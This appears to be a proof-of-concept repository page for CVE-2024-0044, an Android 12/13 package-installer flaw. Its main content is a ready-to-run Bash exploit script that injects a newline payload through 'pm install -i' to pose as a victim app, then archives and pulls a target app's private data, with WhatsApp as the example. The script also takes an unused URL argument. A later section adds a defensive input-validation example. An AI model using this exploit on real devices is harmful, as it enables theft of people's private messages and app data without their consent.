PoC details: 56d73b4d6fdd63fb428ff1705dbb84d662f54e2a

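Related vulnerability
Title: Google Android security vulnerability (CVE-2024-0044)
Description: Google Android is a Linux-based open-source operating system developed by Google (USA). Google Android contains a security vulnerability caused by improper input validation in the createSessionInternal method of PackageInstallerService.java, which may allow running as any application.
Description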
CVE-2024-0044: a "run-as any app" high-severity vulnerability affecting Android versions 12 and 13
Introduction
# CVE-2024-0044-
CVE-2024-0044: a "run-as any app" high-severity vulnerability affecting Android versions 12 and 13

# CVE-2024-0044 Exploit Script

This Bash script demonstrates how to exploit CVE-2024-0044. **For educational and testing purposes only.**

## Prerequisites
- ADB (Android Debug Bridge) installed and configured
- A connected Android device with USB debugging enabled

## Script Code
```bash
#!/bin/bash

# Function to exploit CVE-2024-0044
exploit_cve_2024_0044() {
    local url=$1
    local package_name=$2
    local apk_path=$3

    # Generate payload
    local payload="PAYLOAD=\"@null
victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null\"
pm install -i \"\$PAYLOAD\" /data/local/tmp/$(basename $apk_path)"

    # Push APK to device
    adb push "$apk_path" /data/local/tmp/

    # Execute payload
    adb shell <<< "$payload"

    # Create temporary directory
    adb shell "mkdir /data/local/tmp/wa/"
    adb shell "touch /data/local/tmp/wa/wa.tar"
    adb shell "chmod -R 0777 /data/local/tmp/wa/"

    # Archive target application's data
    adb shell "run-as victim tar -cf /data/local/tmp/wa/wa.tar $package_name"

    # Pull data
    adb pull "/data/local/tmp/wa/wa.tar" "wa_data.tar"
}

# Usage
if [[ $# -ne 3 ]]; then
    echo "Usage: $0 <url> <package_name> <apk_path>"
    echo "Example: $0 https://web.whatsapp.com/ com.whatsapp /path/to/apk.apk"
    exit 1
fi

exploit_cve_2024_0044 "$1" "$2" "$3"
```
## Commands
```bash
chmod +x exploit_cve_2024_0044.sh
./exploit_cve_2024_0044.sh <url> <package_name> <apk_path>
```

### Parameters
- Replace `https://web.whatsapp.com/` with the actual target URL.
- Replace `com.whatsapp` with the target package name.
- Replace `/path/to/apk.apk` with the path to the APK file.
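
The vulnerability description above attributes the flaw to improper input validation, and the script's payload depends on a newline inside the installer argument passed to `pm install -i`. As an added example (not part of this repository and not the Android fix), the following contrasts a writer that copies that field verbatim into a line-oriented registry with one that validates it first. The three-field record layout, the function names and the sample values are constructed for illustration.

```bash
#!/bin/sh
# Added example (not from the PoC repository). The three-field record
# "name uid installer" is a simplified, constructed stand-in for a
# line-oriented package registry.

# Accept only dotted package names whose segments start with a letter and
# contain letters, digits or underscores. Newlines and spaces are rejected.
is_valid_package_name() {
    case $1 in
        ''|*[!A-Za-z0-9_.]*) return 1 ;;  # empty, or a character outside the set
        .*|*.|*..*) return 1 ;;           # empty segment
        *.*) ;;                           # at least two segments
        *) return 1 ;;
    esac
    case ".$1" in
        *.[!A-Za-z]*) return 1 ;;         # a segment starts with a non-letter
    esac
    [ "${#1}" -le 255 ]
}

# Unvalidated writer: the installer field is copied verbatim (the bug class).
write_record_unsafe() {  # args: registry name uid installer
    printf '%s %s %s\n' "$2" "$3" "$4" >> "$1"
}

# Hardened writer: refuses the whole record if the installer name is invalid.
write_record_safe() {    # args: registry name uid installer
    is_valid_package_name "$4" || return 1
    printf '%s %s %s\n' "$2" "$3" "$4" >> "$1"
}

count_records() { wc -l < "$1" | tr -d ' '; }

# Feeds the same inputs to both writers; prints "<unsafe> <safe>" record counts.
demo() {
    dir=$(mktemp -d)
    crafted=$(printf '@null\nforged.entry 10001 @null')  # constructed input
    write_record_unsafe "$dir/unsafe.list" com.example.app 10050 "$crafted"
    write_record_safe "$dir/safe.list" com.example.app 10050 com.android.vending
    write_record_safe "$dir/safe.list" com.example.two 10051 "$crafted" || true
    echo "$(count_records "$dir/unsafe.list") $(count_records "$dir/safe.list")"
    rm -rf "$dir"
}

demo
```

One install request produces two records in the unvalidated registry, while the validating writer keeps only the legitimate record and rejects the crafted one.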


File snapshot

[4.0K] /data/pocs/56d73b4d6fdd63fb428ff1705dbb84d662f54e2a
├── [1.0K] exploit_cve_2024_0044.sh
└── [1.7K] README.md

0 directories, 2 files